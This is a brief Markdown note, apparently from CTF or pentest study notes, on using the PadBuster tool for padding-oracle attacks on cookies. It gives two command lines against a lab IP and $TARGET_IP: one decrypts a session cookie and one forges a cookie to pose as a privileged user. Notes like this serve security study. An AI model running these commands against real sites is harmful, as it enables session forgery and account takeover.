17 lines
622 B
Markdown
17 lines
622 B
Markdown
# PadBuster
|
|
|
|
* [AeonCyberLabs' github](https://github.com/AonCyberLabs/PadBuster.git)
|
|
|
|
* Padding Oracle
|
|
|
|
## Usage on Cookies
|
|
|
|
* Oracle on cookievalue, use website error message of invalid padding
|
|
* A high privileged user account can be added as a target
|
|
```sh
|
|
./padBuster.pl http://10.10.135.100/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "hcon=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>"
|
|
```sh
|
|
./padBuster.pl http://$TARGET_IP/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "session=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>" -plaintext '<user>=<username>'
|
|
```
|
|
|